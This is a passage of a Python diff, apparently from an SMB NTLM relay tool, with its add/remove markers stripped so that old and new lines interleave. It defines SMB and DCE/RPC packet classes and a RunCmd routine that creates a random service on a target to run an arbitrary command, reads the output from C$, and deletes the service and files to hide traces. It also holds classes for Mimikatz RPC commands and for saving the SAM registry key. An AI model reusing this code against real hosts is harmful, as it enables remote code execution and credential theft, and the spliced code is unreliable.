("KeyLen", "\x00"),
("Bcc", "\x10\x00"),
("Guid", os.urandom(16)),
])
##Response packet.
class SMBRelayNTLMAnswer(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("Andxoffset", "\x5f\x01"),
("Action", "\x00\x00"),
("SecBlobLen", "\xea\x00"),
("Bcc", "\x34\x01"),
###NTLMPACKET
("Data", ""),
###NTLMPACKET
])
#Request packet (no calc):
class SMBSessionSetupAndxRequest(Packet):
fields = OrderedDict([
("Wordcount", "\x0c"),
("AndXCommand", "\xff"),
("Reserved","\x00" ),
("AndXOffset", "\xec\x00"),
("MaxBuff","\xff\xff"),
("MaxMPX", "\x32\x00"),
("VCNumber","\x00\x00"),
("SessionKey", "\x00\x00\x00\x00"),
###NTLMPACKET
("Data", ""),
###NTLMPACKET
])
class SMBSessEmpty(Packet):
fields = OrderedDict([
("Empty", "\x00\x00\x00"),
])
##################SMB Request Packet##########################
class SMBHeader(Packet):
fields = OrderedDict([
("proto", "\xff\x53\x4d\x42"),
("cmd", "\x72"),
("error-code", "\x00\x00\x00\x00" ),
("errorcode", "\x00\x00\x00\x00" ),
("flag1", "\x08"),
("flag2", "\x01\xc8"),
("pidhigh", "\x00\x00"),
@@ -308,7 +445,6 @@ class SMBTreeConnectData(Packet):
])
def calculate(self):
##Convert Path to Unicode first before any Len calc.
self.fields["Path"] = self.fields["Path"].encode('utf-16le')
@@ -324,7 +460,42 @@ class SMBTreeConnectData(Packet):
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class SMBTreeDisconnect(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc","\x00\x00"),
])
class SMBNTCreateData(Packet):
fields = OrderedDict([
("Wordcount", "\x18"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\x00\x00"),
("Reserved2", "\x00"),
("FileNameLen", "\x07\x00"),
("CreateFlags", "\x16\x00\x00\x00"),
("RootFID", "\x00\x00\x00\x00"),
("AccessMask", "\x9F\x01\x02\x00"),
("AllocSize", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("FileAttrib", "\x00\x00\x00\x00"),
("ShareAccess", "\x03\x00\x00\x00"),
("Disposition", "\x01\x00\x00\x00"),
("CreateOptions", "\x40\x00\x40\x00"),
("Impersonation", "\x02\x00\x00\x00"),
("SecurityFlags", "\x01"),
("Bcc", "\x08\x00"),
("FileName", ""),
("FileNameNull", "\x00"),
])
def calculate(self):
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
self.fields["Bcc"] = struct.pack("<h",len(Data1))
class SMBNTCreateDataSVCCTL(Packet):
fields = OrderedDict([
("Wordcount", "\x18"),
("AndXCommand", "\xff"),
@@ -343,16 +514,24 @@ class SMBNTCreateData(Packet):
("Impersonation", "\x02\x00\x00\x00"),
("SecurityFlags", "\x00"),
("Bcc", "\x08\x00"),
("FileName", "\\svcctl"),
("FileName", ""),
("FileNameNull", "\x00"),
])
def calculate(self):
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
self.fields["Bcc"] = struct.pack("<h",len(Data1))
class SMBLockingAndXResponse(Packet):
fields = OrderedDict([
("Wordcount", "\x02"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("Andxoffset", "\x00\x00"),
("Bcc", "\x00\x00"),
])
class SMBReadData(Packet):
fields = OrderedDict([
("Wordcount", "\x0a"),
@@ -374,6 +553,31 @@ class SMBReadData(Packet):
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBWriteData(Packet):
fields = OrderedDict([
("Wordcount", "\x0e"),
("AndXCommand", "\xff"),
("Reserved", "\x00" ),
("Andxoffset", "\xde\xde"),
("FID", "\x06\x40"),
("Offset", "\x00\x00\x00\x00"),
("TimeOut", "\x00\x00\x00\x00"),
("WriteMode", "\x01\x00"),
("Remaining", "\x00\x00"),
("DataLenHi", "\x00\x00"),
("DataLenLow", "\xdc\x02"),
("DataOffset", "\x40\x00"),
("HiOffset", "\x00\x00\x00\x00"),
("Bcc", "\xdc\x02"),
("Padding", "\x41"),
("Data", ""),
])
def calculate(self):
self.fields["DataLenLow"] = struct.pack("<H",len(str(self.fields["Data"])))
self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
class SMBDCERPCWriteData(Packet):
fields = OrderedDict([
("Wordcount", "\x0e"),
("AndXCommand", "\xff"),
@@ -397,6 +601,8 @@ class SMBWriteData(Packet):
self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBTransDCERPC(Packet):
fields = OrderedDict([
("Wordcount", "\x10"),
@@ -449,26 +655,26 @@ class SMBTransDCERPC(Packet):
class SMBDCEData(Packet):
fields = OrderedDict([
("Version", "\x05"),
("VersionLow", "\x00"),
("PacketType", "\x0b"),
("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"),
("AuthLen", "\x00\x00"),
("CallID", "\x00\x00\x00\x00"),
("MaxTransFrag", "\xd0\x16"),
("MaxRecvFrag", "\xd0\x16"),
("GroupAssoc", "\x00\x00\x00\x00"),
("CTXNumber", "\x01"),
("CTXPadding", "\x00\x00\x00"),
("CTX0ContextID", "\x00\x00"),
("CTX0ItemNumber", "\x01\x00"),
("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
("CTX0UIDVersion", "\x02\x00"),
("CTX0UIDVersionlo","\x00\x00"),
("CTX0UIDSyntax", "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
("CTX0UIDSyntaxVer","\x02\x00\x00\x00"),
("Version", "\x05"),
("VersionLow", "\x00"),
("PacketType", "\x0b"),
("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"),
("AuthLen", "\x00\x00"),
("CallID", "\x01\x00\x00\x00"),
("MaxTransFrag", "\xd0\x16"),
("MaxRecvFrag", "\xd0\x16"),
("GroupAssoc", "\x00\x00\x00\x00"),
("CTXNumber", "\x01"),
("CTXPadding", "\x00\x00\x00"),
("CTX0ContextID", "\x00\x00"),
("CTX0ItemNumber", "\x01\x00"),
("CTX0UID", "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03"),
("CTX0UIDVersion", "\x02\x00"),
("CTX0UIDVersionlo", "\x00\x00"),
("CTX0UIDSyntax", "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60"),
("CTX0UIDSyntaxVer", "\x02\x00\x00\x00"),
])
def calculate(self):
@@ -502,6 +708,7 @@ class SMBDCEPacketData(Packet):
self.fields["FragLen"] = struct.pack("<h",len(Data1))
self.fields["AllocHint"] = struct.pack("<i",len(str(self.fields["Data"])))
###Psexec
class SMBDCESVCCTLOpenManagerW(Packet):
fields = OrderedDict([
("MachineNameRefID", "\xb5\x97\xb9\xbc"),
@@ -515,6 +722,11 @@ class SMBDCESVCCTLOpenManagerW(Packet):
])
def calculate(self):
#Padding
if len(str(self.fields["MachineName"]))%2==0:
self.fields["MachineNameNull"] = "\x00\x00\x00\x00"
else:
self.fields["MachineNameNull"] = "\x00\x00"
## Convert to UTF-16LE
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
@@ -526,31 +738,28 @@ class SMBDCESVCCTLCreateService(Packet):
("MaxCount", "\x0c\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", "AyAGaxwLhCP"),
("ServiceName", ""),
("MachineNameNull", "\x00\x00"),
("ReferentID", "\x00\x00\x02\x00"),
("MaxCountRefID", "\x11\x00\x00\x00"),
("OffsetID", "\x00\x00\x00\x00"),
("ActualCountRefID", "\x11\x00\x00\x00"),
("DisplayNameID", "DhhUFcsvrfJvLwRq"),
("DisplayNameID", ""),
("DisplayNameIDNull", "\x00\x00\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
("ServerType", "\x10\x01\x00\x00"),
("ServerType", "\x10\x00\x00\x00"),
("ServiceStartType", "\x03\x00\x00\x00"),
("ServiceErrorCtl", "\x00\x00\x00\x00"),
("BinPathMaxCount", "\xb6\x00\x00\x00"),
("BinPathOffset", "\x00\x00\x00\x00"),
("BinPathActualCount", "\xb6\x00\x00\x00"),
("FileName", ""),
("BinPathName", ""),
("BinCMD", ""),
("BintoEnd", ""),
("BinCMDTerminator", "\x00\x00"),
("LoadOrderGroup", "\x00\x00\x00\x00"),
("TagID", "\x00\x00\x00\x00"),
("Dependencies", "\x00\x00\x00\x00"),
("DependenciesLen", "\x00\x00\x00\x00"),
("ServiceStartName", "\x00\x00\x00\x00"),
("ServiceStartUser", "\x00\x00\x00\x00"),
("Password", "\x00\x00\x00\x00"),
("PasswordLen", "\x00\x00\x00\x00"),
("Padding", "\x00\x00"),
@@ -558,30 +767,13 @@ class SMBDCESVCCTLCreateService(Packet):
])
def calculate(self):
self.fields["BinCMD"] = self.fields["BinCMD"].replace("&", "^&")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace("(", "^(")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace(")", "^)")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace("%", "^%")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace(">", "^>")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace("|", "^|")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace("$", "^$")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace("!", "^!")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace(",", "^,")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace("'", "^'")#Filtering
self.fields["BinCMD"] = self.fields["BinCMD"].replace("\"", "^\"")#Filtering
BinDataLen = str(self.fields["BinCMD"])
File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
CleanService = "sc delete "+self.fields["ServiceName"]+"^&"#Start by deleting the service..then run the cmd.
FinalCMD = CleanService+"del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
#That is: delete service we just ran, delete the bat file (it's loaded in memory, no pb), echo original cmd into random .bat file, run .bat file.
self.fields["FileName"] = ""#Reset it.
self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
self.fields["BinCMD"] = FinalCMD
self.fields["BintoEnd"] = "& %COMSPEC% /C "+File
BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
#Padding
if len(str(self.fields["BinCMD"]))%2==0:
self.fields["LoadOrderGroup"] = "\x00\x00\x00\x00"
else:
self.fields["LoadOrderGroup"] = "\x00\x00"
## Calculate first
self.fields["BinPathMaxCount"] = struct.pack("<i",len(BinDataLen)+1)
@@ -590,12 +782,11 @@ class SMBDCESVCCTLCreateService(Packet):
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["MaxCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
self.fields["ActualCountRefID"] = struct.pack("<i",len(str(self.fields["DisplayNameID"]))+1)
## Then convert to UTF-16LE, yeah it's weird..
## Then convert to UTF-16LE
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode('utf-16le')
self.fields["BinPathName"] = self.fields["BinPathName"].encode('utf-16le')
self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
class SMBDCESVCCTLOpenService(Packet):
fields = OrderedDict([
@@ -604,15 +795,20 @@ class SMBDCESVCCTLOpenService(Packet):
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x00\x00\x00\x00"),
("ServiceName", ""),
("MachineNameNull", "\x00\x00"),
("ServiceNameNull", "\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
])
def calculate(self):
#Padding
if len(str(self.fields["ServiceName"]))%2==0:
self.fields["ServiceNameNull"] = "\x00\x00\x00\x00"
else:
self.fields["ServiceNameNull"] = "\x00\x00"
## Calculate first
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["ServiceName"]))+1)
## Then convert to UTF-16LE, yeah it's weird..
## Then convert to UTF-16LE
self.fields["ServiceName"] = self.fields["ServiceName"].encode('utf-16le')
class SMBDCESVCCTLStartService(Packet):
@@ -621,6 +817,42 @@ class SMBDCESVCCTLStartService(Packet):
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
])
class SMBDCESVCCTLControlService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("ControlOperation", "\x01\x00\x00\x00"),
])
class SMBDCESVCCTLDeleteService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
])
class SMBDCESVCCTLCloseService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
])
class SMBDCESVCCTLQueryService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
])
class SMBDCEMimiKatzRPCCommand(Packet):
fields = OrderedDict([
("ContextHandleLen", "\x07\x00\x00\x00"),
("ContextHandle", "\x00\x00\x00\x00"),
("ContextHandleLen2", "\x07\x00\x00\x00"),
("CMD", ""),
("CMDEnd", "\x00\x00"),
])
def calculate(self):
self.fields["ContextHandleLen"] = struct.pack("<i",len(str(self.fields["CMD"]))+1)
self.fields["ContextHandleLen2"] = struct.pack("<i",len(str(self.fields["CMD"]))+1)
self.fields["CMD"] = self.fields["CMD"].encode('utf-16le')
class OpenAndX(Packet):
fields = OrderedDict([
("Wordcount", "\x0f"),
@@ -638,12 +870,11 @@ class OpenAndX(Packet):
("Reserved2", "\x00\x00\x00\x00"),
("Bcc", "\x0b\x00"),
("Terminator", ""),
("File", "\\hola.txt"),
("FileNull", "\x00"),#00 00
("File", ""),
("FileNull", "\x00"),
])
def calculate(self):
#self.fields["File"] = self.fields["File"].encode('utf-16le')
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
class ReadRequest(Packet):
@@ -662,7 +893,7 @@ class ReadRequestAndX(Packet):
("Wordcount", "\x0C"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("AndXOffset", "\xde\xde"),#
("AndXOffset", "\xde\xde"),
("FID", "\x02\x40"),
("Offset", "\x00\x00\x00\x00"),
("MaxCountLow", "\xf0\xff"),
@@ -674,6 +905,42 @@ class ReadRequestAndX(Packet):
])
class SMBDCERPCReadRequestAndX(Packet):
fields = OrderedDict([
("Wordcount", "\x0C"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("AndXOffset", "\xde\xde"),
("FID", "\x02\x40"),
("Offset", "\x00\x00\x00\x00"),
("MaxCountLow", "\xb8\x10"),
("MinCount", "\xb8\x10"),
("Timeout", "\xff\xff\xff\xff"),
("RemainingBytes", "\x00\x00"),
("HighOffset", "\x00\x00\x00\x00"),
("Bcc", "\x00\x00"),
])
class WriteRequestAndX(Packet):
fields = OrderedDict([
("Wordcount", "\x06"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("AndXOffset", "\xde\xde"),
("FID", "\x02\x40"),
("Offset", "\x00\x00\x00\x00"),
("Reserved2", "\xff\xff\xff\xff"),
("WriteMode", "\x00\x00"),
("Remaining", "\x00\x00"),
("DataLenHi", "\x00\x00"),
("DataLenLow", "\x0a\x00"),#actual Len
("DataOffset", "\x3f\x00"),
("Bcc", "\x0a\x00"),
("Padd", ""),
("Data", ""),
])
class CloseRequest(Packet):
fields = OrderedDict([
@@ -694,6 +961,7 @@ class DeleteFileRequest(Packet):
("FileNull", "\x00\x00"),
])
def calculate(self):
self.fields["File"] = self.fields["File"].encode('utf-16le')
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["BuffType"])+str(self.fields["File"])+str(self.fields["FileNull"])))
@@ -708,232 +976,138 @@ class SMBEcho(Packet):
])
###########################PSEXEC#############################################
def ExtractCommandOutput(data):
DataLen = struct.unpack("<H", data[61:63])[0]
Output = data[63:63+DataLen]
return Output
###Winreg
class SMBDCEWinRegOpenHKLMKey(Packet):
fields = OrderedDict([
("Ptr", "\x00\x00\x00\x00"),
("AccessMask", "\x00\x00\x00\x02"),
])
def SMBReadRecv(s):
Completedata=[]
data=''
Start=time.time()
s.setblocking(0)
while 1:
if Completedata and time.time()-Start > 0.5:#Timeout
break
try:
data = s.recv(1024)
if data:
Completedata.append(data)
Start=time.time()
else:
break
except:
pass
class SMBDCEWinRegOpenHKCUKey(Packet):
fields = OrderedDict([
("Ptr", "\x00\x00\x00\x00"),
("AccessMask", "\x00\x00\x00\x02"),
])
s.setblocking(1)
return s, ''.join(Completedata)
class SMBDCEWinRegOpenKey(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("KeySizeUnicode", "\x00\x00"),
("MaxKeySizeUnicode", "\x00\x00"),
("KeyPtr", "\xa9\xdc\x00\x00"),
("ActualKeyMaxSize", "\x00\x00\x00\x00"),#not unicode
("ActualKeyOffset", "\x00\x00\x00\x00"),
("ActualKeySize", "\x00\x00\x00\x00"),#not unicode
("Key", ""),
("KeyTerminator", "\x00\x00"),
("AccessOption", "\x01\x00\x00\x00"),
("AccessMask", "\x00\x00\x00\x02"),
])
def calculate(self):
#Padding
if len(str(self.fields["Key"]))%2==0:
self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["KeyTerminator"] = "\x00\x00"
#Calc first.
self.fields["ActualKeyMaxSize"] = struct.pack("<i",len(str(self.fields["Key"]))+1)
self.fields["ActualKeySize"] = struct.pack("<i",len(str(self.fields["Key"]))+1)
#Convert to unicode.
self.fields["Key"] = self.fields["Key"].encode('utf-16le')
#Recalculate again, in unicode this time.
self.fields["KeySizeUnicode"] = struct.pack("<h",len(str(self.fields["Key"]))+2)
self.fields["MaxKeySizeUnicode"] = struct.pack("<h",len(str(self.fields["Key"]))+2)
def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
if data == None:
return False
head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBNTCreateData()
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
class SMBDCEWinRegQueryInfoKey(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("ClassNameLen", "\x00\x00"),
("ClassNameMaxLen", "\x00\x04"),
("ClassNameRefID", "\x68\x89\x00\x00"),
("ClassNameMaxCount", "\x00\x02\x00\x00"),
("ClassNameOffset", "\x00\x00\x00\x00"),
("ClassNameActualCount", "\x00\x00\x00\x00"),
## Fail Handling.
if data[8:10] == "\xa2\x22":
print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n"
return False
])
## DCE/RPC Write.
if data[8:10] == "\xa2\x00":
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
x = SMBDCEData()
x.calculate()
f = data[42:44]
t = SMBWriteData(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLOpenManagerW.
if data[8:10] == "\x2e\x00":
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=Host[0])
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
class SMBDCEWinRegCloseKey(Packet):
fields = OrderedDict([
("ContextHandle", ""),
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
return False
])
## DCE/RPC Create Service.
if data[8:10] == "\x25\x00":
ContextHandler = data[84:104]
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
FilePath = FileChars
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler, ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath,BinCMD=Command)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
#print "[+] Creating service"
class SMBDCEWinRegCreateKey(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("KeySizeUnicode", "\x00\x00"),
("MaxKeySizeUnicode", "\x00\x00"),
("KeyPtr", "\xde\x01\x00\x00"),
("ActualKeyMaxSize", "\x00\x00\x00\x00"),
("ActualKeyOffset", "\x00\x00\x00\x00"),
("ActualKeySize", "\x00\x00\x00\x00"),
("KeyName", "SAM"),
("KeyTerminator", "\x00\x00"),
("KeyClassLen", "\x00\x00"),
("KeyClassMaxLen", "\x00\x00"),
("KeyClassPtr", "\x00\x00\x00\x00"),
("AccessOption", "\x01\x00\x00\x00"),
("AccessMask", "\x00\x00\x00\x02"),
("SecDescRefID", "\x29\xd8\x00\x00"),
("SecDescLen", "\x00\x00\x00\x00"),
("SecDescPtr", "\x00\x00\x00\x00"),
("SecDescMaxLen", "\x00\x00\x00\x00"),
("SecDescMaxSize", "\x00\x00\x00\x00"),
("Inherit", "\x00\x00\x00\x00"),
("AccessTakenRefID", "\x9c\x3e\x00\x00"),
("ActionTakenRefID", "\x01\x00\x00\x02"),
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
return False
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
])
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
return False
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
def calculate(self):
#Padding
if len(str(self.fields["KeyName"]))%2==0:
self.fields["KeyTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["KeyTerminator"] = "\x00\x00"
#Calc first.
self.fields["ActualKeyMaxSize"] = struct.pack("<i",len(str(self.fields["KeyName"]))+1)
self.fields["ActualKeySize"] = struct.pack("<i",len(str(self.fields["KeyName"]))+1)
#Convert to unicode.
self.fields["KeyName"] = self.fields["KeyName"].encode('utf-16le')
#Recalculate again, in unicode this time.
self.fields["KeySizeUnicode"] = struct.pack("<h",len(str(self.fields["KeyName"]))+2)
self.fields["MaxKeySizeUnicode"] = struct.pack("<h",len(str(self.fields["KeyName"]))+2)
##Tree connect c$
if data[8:10] == "\x25\x00":
class SMBDCEWinRegSaveKey(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("FileSizeUnicode", "\x00\x00"),
("MaxFileSizeUnicode", "\x00\x00"),
("FilePtr", "\xa9\xdc\x00\x00"),
("ActualFileMaxSize", "\x00\x00\x00\x00"),#not unicode
("ActualFileOffset", "\x00\x00\x00\x00"),
("ActualFileSize", "\x00\x00\x00\x00"),#not unicode
("File", ""),
("FileTerminator", "\x00\x00"),
("SecAttrib", "\x00\x00\x00\x00"),
])
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
return False
#print "[+] Command executed, grabbing output now."
Logs.info('Command executed:')
Logs.info(clientIP+","+Username+','+Command)
#print "[+] Removing service.\n[+] Cleaning up output file.\n"
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
##OpenAndX.
if data[8:10] == "\x75\x00":
head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
##OpenAndX.
if data[8:10] == "\x2d\x34":
time.sleep(1)#not found, maybe still processing the cmd. Wait a bit.
head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
##OpenAndX.
if data[8:10] == "\x2d\x34":
time.sleep(1)#not found, command failed.
print "[+] The command failed."
return data
##ReadRequest.
## Need grab the size from Open And X and do it properly later. For now, only 65535 bytes printed.
if data[8:10] == "\x2d\x00":
ReturnedFID = data[41:43]
head = SMBHeader(cmd="\x2e",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00")
t = ReadRequestAndX(FID=ReturnedFID)
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
s, data = SMBReadRecv(s)
#print "[+] Output:\n"
print ExtractCommandOutput(data)
##Close Request
if data[8:10] == "\x2e\x00":
head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
t = CloseRequest(FID = ReturnedFID)
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
##DeleteFileRequest.
if data[8:10] == "\x04\x00":
head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00")
t = DeleteFileRequest(File="\\Windows\\Temp\\Results.txt")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
#print "[+] Deleting file now."
s.send(buffer1)
data = s.recv(2048)
if data[8:10] == "\x06\x00":
#print "[+] File deleted, making sure it's not there anymore.."
head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
t = OpenAndX(File="\\Windows\\Temp\\Results.txt", OpenFunc="\x01\x00")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
return data
def calculate(self):
